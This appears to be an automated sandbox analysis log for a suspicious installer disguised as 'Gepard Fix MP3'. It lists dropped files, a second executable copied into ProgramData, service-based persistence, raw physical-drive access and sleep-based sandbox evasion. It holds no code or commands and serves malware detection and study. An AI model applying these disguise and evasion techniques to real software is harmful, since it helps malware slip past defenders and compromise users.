        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-R0PI7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeFile created: C:\ProgramData\Epic Project Studio 10.4.46\Epic Project Studio 10.4.46.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-EVRO2.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-K0336.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-5TE1U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-6TDVA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-LEQ3C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-QGCVQ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-N1QBV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-9D3SM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\uninstall\is-R93BU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\eCh9R4T214.exeFile created: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-2DTNR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-F27BV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-S7VJT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-O973I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-K35BI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-M3CH8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-JUGCD.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-1P9P2.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-7DR0L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-UKG3R.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-265R7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-80S4I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-BPSO6.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeFile created: C:\ProgramData\Epic Project Studio 10.4.46\Epic Project Studio 10.4.46.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02C2F8A7
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_00402736 StartServiceCtrlDispatcherA,3_2_00402736
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F128
        Source: C:\Users\user\Desktop\eCh9R4T214.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02C2F9AB
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeWindow / User API: threadDelayed 6708Jump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeWindow / User API: threadDelayed 3148Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-7GMIE.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-LB9DM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-JJBLM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-BCCM6.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-MC0JN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-R0PI7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-EVRO2.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-K0336.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-5TE1U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-6TDVA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-QGCVQ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-LEQ3C.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-N1QBV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-9D3SM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\uninstall\is-R93BU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-2DTNR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-F27BV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-S7VJT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-O973I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-K35BI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-M3CH8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-JUGCD.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-7DR0L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-1P9P2.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-UKG3R.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-265R7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-80S4I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\is-BPSO6.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Gepard Fix MP3\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\eCh9R4T214.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5689
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-19553
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe TID: 1548Thread sleep count: 6708 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe TID: 1548Thread sleep time: -13416000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe TID: 5708Thread sleep count: 67 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe TID: 5708Thread sleep time: -4020000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe TID: 1548Thread sleep count: 3148 > 30Jump to behavior
